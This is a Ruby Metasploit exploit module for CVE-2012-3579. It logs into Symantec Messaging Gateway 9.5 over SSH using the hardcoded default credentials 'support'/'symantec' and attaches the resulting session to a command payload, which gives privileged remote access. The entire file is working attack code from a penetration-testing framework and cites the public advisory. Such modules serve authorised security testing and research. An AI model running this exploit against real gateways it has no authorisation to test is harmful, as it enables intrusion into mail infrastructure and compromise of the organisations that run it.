##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'net/ssh'
require 'net/ssh/command_stream'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SSH

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Symantec Messaging Gateway 9.5 Default SSH Password Vulnerability',
        'Description' => %q{
          This module exploits a default misconfiguration flaw on Symantec Messaging Gateway.
          The 'support' user has a known default password, which can be used to login to the
          SSH service, and gain privileged access from remote.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Stefan Viehbock', # Original discovery
          'Ben Williams',    # Reporting the vuln + coordinated release
          'sinn3r'           # Metasploit
        ],
        'References' => [
          ['CVE', '2012-3579'],
          ['OSVDB', '85028'],
          ['BID', '55143'],
          ['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00'],
          ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        'Payload' => {
          'Compat' => {
            'PayloadType' => 'cmd_interact',
            'ConnectionType' => 'find'
          }
        },
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'Targets' => [
          ['Symantec Messaging Gateway 9.5', {}],
        ],
        'Privileged' => true,
        # Timestamp on Symantec advisory
        # But was found on Jun 26, 2012
        'DisclosureDate' => '2012-08-27',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => []
        }
      )
    )

    register_options([
      Opt::RPORT(22)
    ])

    register_advanced_options([
      OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
      OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
    ])
  end

  def do_login(user, pass)
    opts = ssh_client_defaults.merge({
      auth_methods: ['password', 'keyboard-interactive'],
      port: rport,
      password: pass
    })

    opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']

    begin
      ssh = nil
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        ssh = Net::SSH.start(rhost, user, opts)
      end
    rescue Rex::ConnectionError
      return
    rescue Net::SSH::Disconnect, ::EOFError
      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Disconnected during negotiation"
      return
    rescue ::Timeout::Error
      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Timed out during negotiation"
      return
    rescue Net::SSH::AuthenticationFailed
      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Failed authentication"
    rescue Net::SSH::Exception => e
      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH Error: #{e.class} : #{e.message}"
      return
    end

    if ssh
      conn = Net::SSH::CommandStream.new(ssh, logger: self)
      ssh = nil
      return conn
    end

    return nil
  end

  def exploit
    user = 'support'
    pass = 'symantec'

    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Attempt to login...")
    conn = do_login(user, pass)
    if conn
      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Login Successful (#{user}:#{pass})")
      handler(conn.lsock)
    end
  end
end
